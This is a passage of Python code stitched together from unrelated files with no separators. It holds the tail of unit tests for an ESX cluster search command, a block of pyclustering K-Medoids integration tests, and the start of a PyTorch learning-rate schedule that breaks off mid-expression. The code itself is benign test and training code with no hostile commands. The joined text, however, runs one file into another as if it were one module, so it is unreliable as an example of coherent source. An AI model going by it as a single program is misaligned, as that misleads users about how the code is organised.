utmc1" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchclean(out, "utecl4", command) def testmetaclusteravailable(self): command = "search cluster --cluster_type esx --metacluster utmc1" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchclean(out, "utecl4", command) def testmetaclusterunavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--esx_metacluster', 'metacluster-does-not-exist'] out = self.notfoundtest(command) self.matchoutput(out, "Metacluster metacluster-does-not-exist not found.", command) def testclusteravailablefull(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--cluster', 'utecl1', '--fullinfo'] out = self.commandtest(command) self.matchoutput(out, "ESX Cluster: utecl1", command) self.matchoutput(out, "Metacluster: utmc1", command) self.matchoutput(out, "Building: ut", command) def testesxhostavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--member_hostname', 'evh1.aqd-unittest.ms.com'] out = self.commandtest(command) self.matchoutput(out, "utecl2", command) self.matchclean(out, "utecl1", command) def testesxhostunavailable(self): command = ["search_cluster", "--cluster_type=esx", "--member_hostname=host-does-not-exist.aqd-unittest.ms.com"] out = self.notfoundtest(command) self.matchoutput(out, "Host host-does-not-exist.aqd-unittest.ms.com " "not found", command) def testvmavailable(self): command = "search cluster --cluster_type esx --esx_virtual_machine evm1" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) def testvmunavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--esx_virtual_machine', 'machine-does-not-exist'] out = self.notfoundtest(command) self.matchoutput(out, "Machine machine-does-not-exist not found", command) def testguestavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--esx_guest', 'aqddesk1.msad.ms.com'] out = self.commandtest(command) self.matchoutput(out, "utecl1", command) def testguestunavailable(self): command = ["search_cluster", "--cluster_type=esx", "--esx_guest=host-does-not-exist.aqd-unittest.ms.com"] out = self.notfoundtest(command) self.matchoutput(out, "Host host-does-not-exist.aqd-unittest.ms.com " "not found", command) # TODO we have an almost duplicate def testdomainavailable(self): command = "search cluster --cluster_type esx --domain unittest" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) # def testdomainunavailable(self): # command = ['search', 'cluster', '--cluster_type', 'esx', # '--domain', 'domain-does-not-exist'] # out = self.notfoundtest(command) # self.matchoutput(out, "Domain domain-does-not-exist not found.", # command) def testarchetypeavailable(self): command = "search cluster --cluster_type esx --archetype esx_cluster" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) # def testarchetypeunavailable(self): # command = ['search', 'cluster', '--cluster_type', 'esx', # '--archetype', 'archetype-does-not-exist'] # out = self.notfoundtest(command) # self.matchoutput(out, "Archetype archetype-does-not-exist not found", # command) # TODO we have similar test def testpersonalityavailable(self): command = "search cluster --cluster_type esx --personality vulcan-10g-server-prod" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) # TODO we have similar test def testpersonalityavailable2(self): command = ["search_cluster", "--cluster_type=esx", "--archetype=esx_cluster", "--personality=vulcan-10g-server-prod"] out = self.commandtest(command) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) # def testpersonalityunavailable(self): # # Will only get this error if archetype is specified # command = ["search_cluster", "--cluster_type=esx", # "--archetype=vmhost", # "--personality=personality-does-not-exist"] # out = self.notfoundtest(command) # self.matchoutput(out, "Personality personality-does-not-exist, " # "archetype vmhost not found.", command) # def testpersonalityunavailable2(self): # # Will only get an error if archetype is specified # command = ['search', 'cluster', '--cluster_type', 'esx', # '--personality', 'personality-does-not-exist'] # self.noouttest(command) def testall(self): command = "search cluster --cluster_type esx" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) def testallfull(self): command = "search cluster --cluster_type esx --fullinfo" out = self.commandtest(command.split(" ")) # This is a good sampling, but not the full output self.matchoutput(out, "ESX Cluster: utecl1", command) self.matchoutput(out, "ESX Cluster: utecl2", command) self.matchoutput(out, "ESX Cluster: utecl3", command) self.matchoutput(out, "ESX Cluster: utecl4", command) self.matchoutput(out, "Metacluster: utmc1", command) self.matchoutput(out, "Metacluster: utmc2", command) self.matchoutput(out, "Building: ut", command) def testserviceavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--service', 'esx_management_server'] out = self.commandtest(command) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchclean(out, "utecl3", command) self.matchclean(out, "utecl4", command) def testserviceunavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--service', 'service-does-not-exist'] out = self.notfoundtest(command) self.matchoutput(out, "Service service-does-not-exist not found", command) def testserviceinstanceavailable(self): command = ["search_cluster", "--cluster_type=esx", "--service=esx_management_server", "--instance=ut.a"] out = self.commandtest(command) command = ["search_cluster", "--cluster_type=esx", "--service=esx_management_server", "--instance=ut.b"] out += self.commandtest(command) # Which clusters are bound to either particular instance is # non-deterministic, but they should all be bound to one or the other. self.matchoutput(out, "utecl", command) def testserviceinstanceunavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--service', 'esx_management_server', '--instance', 'service-instance-does-not-exist'] out = self.notfoundtest(command) self.matchoutput(out, "Service Instance " "service-instance-does-not-exist, " "service esx_management_server not found.", command) def testinstanceavailable(self): command = "search cluster --cluster_type esx --instance ut.a" out = self.commandtest(command.split(" ")) command = "search cluster --cluster_type esx --instance ut.b" out += self.commandtest(command.split(" ")) # Which clusters are bound to either particular instance is # non-deterministic, but they should all be bound to one or the other. self.matchoutput(out, "utecl", command) def testinstanceunavailable(self): command = ["search_cluster", "--cluster_type=esx", "--instance=service-instance-does-not-exist"] self.noouttest(command) # Kept it since the output is different from testclusterlocationavailable def testesxclusterlocationavailable(self): command = "search cluster --cluster_type esx --cluster_building ut" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) # Removed, we have duplicate # def testclusterlocationunavailable(self): # command = ["search_cluster", "--cluster_type=esx", # "--cluster_building=building-does-not-exist"] # out = self.notfoundtest(command) # self.matchoutput(out, "Building building-does-not-exist not found", # command) def testvmhostlocationavailable(self): command = "search cluster --cluster_type esx --member_rack ut10" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchclean(out, "utecl3", command) self.matchclean(out, "utecl4", command) def testvmhostlocationbuilding(self): command = "search cluster --cluster_type esx --member_building ut" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchclean(out, "utecl3", command) self.matchclean(out, "utecl4", command) def testvmhostlocationunavailable(self): command = ["search_cluster", "--cluster_type=esx", "--member_rack=rack-not-exist"] out = self.notfoundtest(command) self.matchoutput(out, "Rack rack-not-exist not found", command) # TODO we have an almost duplicate, do we want this? def testbuildstatuspos(self): command = ['search_cluster', '--cluster_type=esx', '--buildstatus=build'] out = self.commandtest(command) self.matchoutput(out, "utecl4", command) def testbuildstatusneg(self): command = ['search_cluster', '--cluster_type=esx', '--buildstatus=decommissioned'] self.noouttest(command) if __name__ == '__main__': suite = unittest.TestLoader().loadTestsFromTestCase(TestSearchClusterESX) unittest.TextTestRunner(verbosity=2).run(suite) """! @brief Integration-tests for K-Medoids algorithm. @authors () @date 2014-2020 @copyright BSD-3-Clause """ import unittest # Generate images without having a window appear. import matplotlib matplotlib.use('Agg') from pyclustering.cluster.tests.kmedoids_templates import kmedoids_test_template from pyclustering.cluster.kmedoids import kmedoids from pyclustering.samples.definitions import SIMPLE_SAMPLES, SIMPLE_ANSWERS from pyclustering.utils import read_sample from pyclustering.utils.metric import type_metric, distance_metric from pyclustering.core.tests import remove_library class KmedoidsIntegrationTest(unittest.TestCase): def testClusterAllocationSampleSimple1ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], True) def testClusterAllocationSampleSimple1WrongInitials1ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [1, 2, 3, 4], [2, 2, 3, 3], True) def testClusterAllocationSampleSimple1DistanceMatrixByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], True, data_type='distance_matrix') def testClusterAllocationSampleSimple1EuclideanByCore(self): metric = distance_metric(type_metric.EUCLIDEAN) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1EuclideanDistanceMatrixByCore(self): metric = distance_metric(type_metric.EUCLIDEAN) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1SquareEuclideanByCore(self): metric = distance_metric(type_metric.EUCLIDEAN_SQUARE) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1SquareEuclideanDistanceMatrixByCore(self): metric = distance_metric(type_metric.EUCLIDEAN_SQUARE) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1ManhattanByCore(self): metric = distance_metric(type_metric.MANHATTAN) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1ManhattanDistanceMatrixByCore(self): metric = distance_metric(type_metric.MANHATTAN) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1ChebyshevByCore(self): metric = distance_metric(type_metric.CHEBYSHEV) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1ChebyshevDistanceMatrixByCore(self): metric = distance_metric(type_metric.CHEBYSHEV) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1MinkowskiByCore(self): metric = distance_metric(type_metric.MINKOWSKI, degree=2.0) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1MinkowskiDistanceMatrixByCore(self): metric = distance_metric(type_metric.MINKOWSKI, degree=2.0) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1GowerByCore(self): metric = distance_metric(type_metric.GOWER, data=read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1GowerDistanceMatrixByCore(self): metric = distance_metric(type_metric.GOWER, data=read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1UserDefinedByCore(self): metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN)) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1UserDefinedDistanceMatrixByCore(self): metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN)) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterOneAllocationSampleSimple1ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [5], [10], True) def testClusterOneAllocationSampleSimple1DistanceMatrixByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [5], [10], True, data_type='distance_matrix') def testClusterAllocationSampleSimple2ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [3, 12, 20], [10, 5, 8], True) def testClusterAllocationSampleSimple2DistanceMatrixByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [3, 12, 20], [10, 5, 8], True, data_type='distance_matrix') def testClusterOneAllocationSampleSimple2ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [10], [23], True) def testClusterOneAllocationSampleSimple2DistanceMatrixByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [10], [23], True, data_type='distance_matrix') def testClusterAllocationSampleSimple3ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [4, 12, 25, 37], [10, 10, 10, 30], True) def testClusterOneAllocationSampleSimple3ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [30], [60], True) def testClusterAllocationSampleSimple5ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [4, 18, 34, 55], [15, 15, 15, 15], True) def testClusterOneAllocationSampleSimple5ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [35], [60], True) def testClusterTheSameData1ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, [2, 20], [10, 20], True) def testClusterTheSameData2ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, [2, 7, 12], [5, 5, 5], True) def testClusterAllocationTheSameObjectsOneInitialMedoidByCore(self): kmedoids_test_template.templateClusterAllocationTheSameObjects(20, 1, True) def testClusterAllocationTheSameObjectsTwoInitialMedoidsByCore(self): kmedoids_test_template.templateClusterAllocationTheSameObjects(15, 2, True) def testClusterAllocationTheSameObjectsThreeInitialMedoidsByCore(self): kmedoids_test_template.templateClusterAllocationTheSameObjects(25, 3, True) def testCoreInterfaceIntInputData(self): kmedoids_instance = kmedoids([[1], [2], [3], [20], [21], [22]], [2, 5], 0.025, True) kmedoids_instance.process() assert len(kmedoids_instance.get_clusters()) == 2 def testAllocatedRequestedClustersSampleSimple04ByCore(self): sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE4) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 10, None, True) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 25, None, True) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 40, None, True) def testAllocatedRequestedClustersWithTheSamePointsByCore(self): # Bug issue #366 - Kmedoids returns incorrect number of clusters. sample = [[0.0, 0.0], [0.1, 0.1], [0.0, 0.0], [0.1, 0.2]] kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 3, None, True) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 3, None, True) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 2, None, True) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 1, None, True) def testAllocatedRequestedClustersWithTheSamePoints2(self): sample = [[0.23, 0.2], [-0.1, 0.1], [0.0, 0.9], [0.1, -0.2], [0.8, 0.1], [-0.1, 0.1], [-0.4, -0.2], [0.0, 0.9]] answers = [1, 2, 3, 4, 5, 6, 6, 6] for expected_amount in answers: kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, expected_amount, None, True) def testAllocatedRequestedClustersWithTotallyTheSamePointsByCore(self): # Bug issue #366 - Kmedoids returns incorrect number of clusters. sample = [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]] kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 1, None, True) def testProcessingWhenLibraryCoreRemoved(self): self.runRemoveLibraryCoreTest() @remove_library def runRemoveLibraryCoreTest(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], True) def testItermax0(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [], True, itermax=0) def testItermax1(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], True, itermax=1) def testItermax10Simple01(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], True, itermax=10) def testItermax10Simple02(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [3, 12, 20], [10, 5, 8], True, itermax=10) def testSimple01AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, True, random_state=1000) def testSimple01AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, True, random_state=1000, data_type='distance_matrix') def testSimple02AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, True, random_state=1000) def testSimple02AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, True, random_state=1000, data_type='distance_matrix') def testSimple03AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, True, random_state=1000) def testSimple03AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, True, random_state=1000, data_type='distance_matrix') def testSimple04AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, SIMPLE_ANSWERS.ANSWER_SIMPLE4, True, random_state=1000) def testSimple04AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, SIMPLE_ANSWERS.ANSWER_SIMPLE4, True, random_state=1000, data_type='distance_matrix') def testSimple05AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, SIMPLE_ANSWERS.ANSWER_SIMPLE5, True, random_state=1000) def testSimple05AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, SIMPLE_ANSWERS.ANSWER_SIMPLE5, True, random_state=1000, data_type='distance_matrix') def testSimple06AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, SIMPLE_ANSWERS.ANSWER_SIMPLE6, True, random_state=1000) def testSimple06AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, SIMPLE_ANSWERS.ANSWER_SIMPLE6, True, random_state=1000, data_type='distance_matrix') def testSimple07AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, SIMPLE_ANSWERS.ANSWER_SIMPLE7, True, random_state=1000) def testSimple07AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, SIMPLE_ANSWERS.ANSWER_SIMPLE7, True, random_state=1000, data_type='distance_matrix') def testSimple08AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, SIMPLE_ANSWERS.ANSWER_SIMPLE8, True, random_state=1000) def testSimple08AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, SIMPLE_ANSWERS.ANSWER_SIMPLE8, True, random_state=1000, data_type='distance_matrix') def testSimple09AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, SIMPLE_ANSWERS.ANSWER_SIMPLE9, True, random_state=1000) def testSimple09AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, SIMPLE_ANSWERS.ANSWER_SIMPLE9, True, random_state=1000, data_type='distance_matrix') def testSimple10AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, SIMPLE_ANSWERS.ANSWER_SIMPLE10, True, random_state=1000) def testSimple10AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, SIMPLE_ANSWERS.ANSWER_SIMPLE10, True, random_state=1000, data_type='distance_matrix') def testSimple11AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, SIMPLE_ANSWERS.ANSWER_SIMPLE11, True, random_state=1000) def testSimple11AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, SIMPLE_ANSWERS.ANSWER_SIMPLE11, True, random_state=1000, data_type='distance_matrix') def testSimple12AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, SIMPLE_ANSWERS.ANSWER_SIMPLE12, True, random_state=1000) def testSimple12AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, SIMPLE_ANSWERS.ANSWER_SIMPLE12, True, random_state=1000, data_type='distance_matrix') def testSimple13AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, SIMPLE_ANSWERS.ANSWER_SIMPLE13, True, random_state=1000) def testSimple13AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, SIMPLE_ANSWERS.ANSWER_SIMPLE13, True, random_state=1000, data_type='distance_matrix') def test_initial_medoids_sample01_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True) def test_initial_medoids_sample01_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, data_type='distance_matrix') def test_initial_medoids_sample01_wrong_amount_1_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, [4], True) def test_initial_medoids_sample01_wrong_amount_3_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 3, [4, 8, 0], True) def test_initial_medoids_sample01_wrong_amount_10_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10, [4, 8, 0, 9, 1, 7, 6, 5, 2, 3], True) def test_initial_medoids_sample01_euclidean_by_core(self): metric = distance_metric(type_metric.EUCLIDEAN) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric) def test_initial_medoids_sample01_euclidean_square_by_core(self): metric = distance_metric(type_metric.EUCLIDEAN_SQUARE) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric) def test_initial_medoids_sample01_euclidean_square_matrix_by_core(self): metric = distance_metric(type_metric.EUCLIDEAN_SQUARE) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric, data_type='distance_matrix') def test_initial_medoids_sample01_euclidean_manhattan_by_core(self): metric = distance_metric(type_metric.MANHATTAN) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric) def test_initial_medoids_sample01_euclidean_manhattan_matrix_by_core(self): metric = distance_metric(type_metric.MANHATTAN) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric, data_type='distance_matrix') def test_initial_medoids_sample01_euclidean_chebyshev_by_core(self): metric = distance_metric(type_metric.CHEBYSHEV) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric) def test_initial_medoids_sample01_euclidean_chebyshev_matrix_by_core(self): metric = distance_metric(type_metric.CHEBYSHEV) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric, data_type='distance_matrix') def test_initial_medoids_sample02_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, [3, 20, 14], True) def test_initial_medoids_sample02_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, [3, 20, 14], True, data_type='distance_matrix') def test_initial_medoids_sample03_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, [28, 56, 5, 34], True) def test_initial_medoids_sample03_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, [28, 56, 5, 34], True, data_type='distance_matrix') def test_initial_medoids_sample04_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 5, [44, 7, 64, 25, 55], True) def test_initial_medoids_sample04_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 5, [44, 7, 64, 25, 55], True, data_type='distance_matrix') def test_initial_medoids_one_dimensional_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, [0, 20], True) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 1, [0], True) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 3, [0, 20, 1], True) def test_initial_medoids_one_dimensional_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, [0, 20], True, data_type='distance_matrix') kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 1, [0], True, data_type='distance_matrix') kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 3, [0, 20, 1], True, data_type='distance_matrix') def test_initial_medoids_three_dimensional_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, [15, 4], True) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1, [15], True) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 3, [15, 4, 14], True) def test_initial_medoids_three_dimensional_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, [15, 4], True, data_type='distance_matrix') kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1, [15], True, data_type='distance_matrix') kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 3, [15, 4, 14], True, data_type='distance_matrix') import torch from torch.optim.lr_scheduler import _LRScheduler LR_START = 0.00001 LR_MAX = 0.0001 LR_MIN = 0.00001 LR_RAMPUP_EPOCHS = 15 LR_SUSTAIN_EPOCHS = 3 LR_EXP_DECAY = .8 def lrfn(epoch): if epoch < LR_RAMPUP_EPOCHS: lr = (LR_MAX - LR_START) / LR_RAMPUP_EPOCHS * epoch + LR_START elif epoch < LR_RAMPUP_EPOCHS + LR_SUSTAIN_EPOCHS: lr = LR_MAX else: lr = (LR_MAX - LR_MIN) * LR_EXP_DECAY**(epoch 